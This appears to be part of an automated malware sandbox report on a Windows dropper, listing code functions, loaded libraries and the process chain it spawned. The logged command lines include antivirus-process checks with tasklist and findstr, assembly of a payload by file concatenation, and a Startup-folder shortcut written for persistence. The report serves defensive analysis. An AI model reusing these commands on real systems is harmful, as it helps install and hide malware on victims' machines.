Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0079F40911_2_0079F409
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0077166311_2_00771663
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0078F62811_2_0078F628
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007916B411_2_007916B4
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0077F6A011_2_0077F6A0
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007978C311_2_007978C3
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_00791BA811_2_00791BA8
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0079DBA511_2_0079DBA5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007A9CE511_2_007A9CE5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0078DD2811_2_0078DD28
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_0079BFD611_2_0079BFD6
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_00791FC011_2_00791FC0
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008BB02017_2_008BB020
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008B94E017_2_008B94E0
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008B9C8017_2_008B9C80
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008D23F517_2_008D23F5
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0093840017_2_00938400
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008E650217_2_008E6502
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008BE6F017_2_008BE6F0
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008E265E17_2_008E265E
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008D282A17_2_008D282A
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008E89BF17_2_008E89BF
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_00930A3A17_2_00930A3A
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008E6A7417_2_008E6A74
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008C0BE017_2_008C0BE0
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_0090EDB217_2_0090EDB2
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008DCD5117_2_008DCD51
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_00930EB717_2_00930EB7
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_00918E4417_2_00918E44
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008E6FE617_2_008E6FE6
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008D33B717_2_008D33B7
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008DF40917_2_008DF409
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008CD45D17_2_008CD45D
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008BF6A017_2_008BF6A0
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008D16B417_2_008D16B4
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008CF62817_2_008CF628
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008B166317_2_008B1663
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008D78C317_2_008D78C3
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008D1BA817_2_008D1BA8
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008DDBA517_2_008DDBA5
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008E9CE517_2_008E9CE5
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008CDD2817_2_008CDD28
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008D1FC017_2_008D1FC0
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008DBFD617_2_008DBFD6
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: String function: 00790D17 appears 70 times
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: String function: 00781A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: String function: 00798B30 appears 42 times
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: String function: 008D8B30 appears 42 times
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: String function: 008D0D17 appears 70 times
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: String function: 008C1A36 appears 34 times
Source: C:\Users\user\Desktop\PkContent.exeCode function: String function: 004062A3 appears 58 times
Source: PkContent.exe, 00000000.00000003.2079934627.00000000029F3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs PkContent.exe
Source: PkContent.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal92.expl.evad.winEXE@28/14@2/0
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007DA6AD GetLastError,FormatMessageW,11_2_007DA6AD
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007C8DE9 AdjustTokenPrivileges,CloseHandle,11_2_007C8DE9
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007C9399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,11_2_007C9399
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_00908DE9 AdjustTokenPrivileges,CloseHandle,17_2_00908DE9
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_00909399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,17_2_00909399
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D4148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,11_2_007D4148
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007D443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,11_2_007D443D
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifFile created: C:\Users\user\AppData\Local\GuardKey SolutionsJump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6552:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6572:120:WilError_03
Source: C:\Users\user\Desktop\PkContent.exeFile created: C:\Users\user\AppData\Local\Temp\nszFA73.tmpJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
Source: PkContent.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Users\user\Desktop\PkContent.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PkContent.exeReversingLabs: Detection: 63%
Source: C:\Users\user\Desktop\PkContent.exeFile read: C:\Users\user\Desktop\PkContent.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\PkContent.exe "C:\Users\user\Desktop\PkContent.exe"
Source: C:\Users\user\Desktop\PkContent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.bat
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 724598
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "WowLiberalCalOfficer" Weight
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated y
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Thermal.pif y
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exit
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"
Source: C:\Users\user\Desktop\PkContent.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Hammer Hammer.bat & Hammer.batJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 724598Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "WowLiberalCalOfficer" Weight Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Explorer + ..\West + ..\Agencies + ..\Situated yJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pif Thermal.pif yJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & echo URL="C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.url" & exitJump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr "C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scr" "C:\Users\user\AppData\Local\GuardKey Solutions\g"Jump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: shfolder.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: riched20.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: usp10.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: msls31.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: textshaping.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: ntmarta.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\choice.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: jscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: wsock32.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: version.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: winmm.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: mpr.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: wininet.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: napinsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: wshbth.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: nlaapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: mswsock.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: dnsapi.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: winrnr.dllJump to behavior
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrSection loaded: rasadhlp.dllJump to behavior
Source: C:\Users\user\Desktop\PkContent.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: PkContent.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\PkContent.exeCode function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_004062FC
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_00798B75 push ecx; ret 11_2_00798B88
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008D8B75 push ecx; ret 17_2_008D8B88

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifFile created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifFile created: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrJump to dropped file
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.urlJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HermesKey.urlJump to behavior
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_007F59B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,11_2_007F59B3
Source: C:\Users\user\AppData\Local\Temp\724598\Thermal.pifCode function: 11_2_00785EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,11_2_00785EDA
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_009359B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,17_2_009359B3
Source: C:\Users\user\AppData\Local\GuardKey Solutions\HermesKey.scrCode function: 17_2_008C5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,17_2_008C5EDA
